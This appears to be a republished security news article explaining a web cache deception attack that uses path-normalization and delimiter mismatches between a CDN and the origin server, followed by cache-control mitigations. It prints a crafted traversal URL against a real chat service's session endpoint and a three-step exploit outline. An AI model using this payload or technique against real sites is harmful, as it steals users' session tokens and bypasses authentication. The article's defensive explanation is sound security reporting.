A newly documented cache deception attack leverages mismatches in path normalization and delimiter handling between caching layers and origin servers to expose sensitive endpoints and steal authentication tokens.
Researchers have demonstrated how subtle discrepancies in URL processing can trick a content delivery network (CDN) into caching protected resources—only for an attacker to retrieve them later, bypassing authentication controls.
Understanding the Vulnerability
At the heart of this attack lies a miscommunication between the cache and the origin server. Caching layers typically identify static assets by file extension or directory prefix, while origin servers enforce routing and access control based on normalized paths.
When those two systems disagree on how to interpret a URL, sensitive pages intended to remain uncached can be stored in shared caches. An attacker can then fetch private data—such as session cookies or API tokens—without ever authenticating.
For example, chat.openai[.]com/api/auth/session.css returns a 400 error and is not cached, whereas chat.openai[.]com/api/auth/session/test.css succeeds and is cached because it appears under a “share” directory. By requesting a crafted path like:
https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123
the CDN sees it as “share/…/api/auth/session” (thus caches it), but the origin server normalizes the path to “api/auth/session” and returns the session token.
Attack Methodology and Mitigations
Attackers must first identify a directory or extension the cache treats as static. They then craft URLs using delimiters or traversal sequences that pass through the cache unchanged but are normalized by the origin. Common techniques include:
- Path mapping discrepancies: Appending fake extensions (e.g., .css, .js) to API endpoints.
- Delimiter confusion: Using characters like ;, #, or encoded slashes (%2F) that the cache ignores but the origin processes.
- Normalization exploits: Combining traversal tokens (..) with encoded separators so the cache maps to a static path while the origin resolves to a protected endpoint.
A successful exploit often involves three steps:
- Verify cache caching behavior under a known static directory.
- Test path traversal and delimiter handling to confirm differential normalization.
- Retrieve cached sensitive resource by querying the crafted URL.
To mitigate such attacks, organizations should enforce consistent URL normalization across all layers and ensure that sensitive endpoints never carry cacheable headers. Proper configuration of cache-control directives is critical:
Directive | Behavior |
Cache-Control: public | Any intermediary (CDN, proxy, browser) may cache |
Cache-Control: private | Only the end user’s browser may cache; no shared cache |
Cache-Control: no-store | Prevents caching anywhere, including browser memory |
Developers should audit CDN rules to reject requests containing unexpected delimiters or encoded traversal sequences.
Additionally, origin servers must apply strict routing rules that ignore arbitrary suffixes—and return appropriate cache-control headers (e.g., no-store) on all authenticated endpoints.
Regular cache-behavior testing using tools like PortSwigger labs can help identify misconfigurations before they are exploited in the wild.
By aligning cache and origin interpretations of URLs and rigorously tagging private content as non-cacheable, organizations can close this novel vector for unauthorized data exposure.
Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!
Source link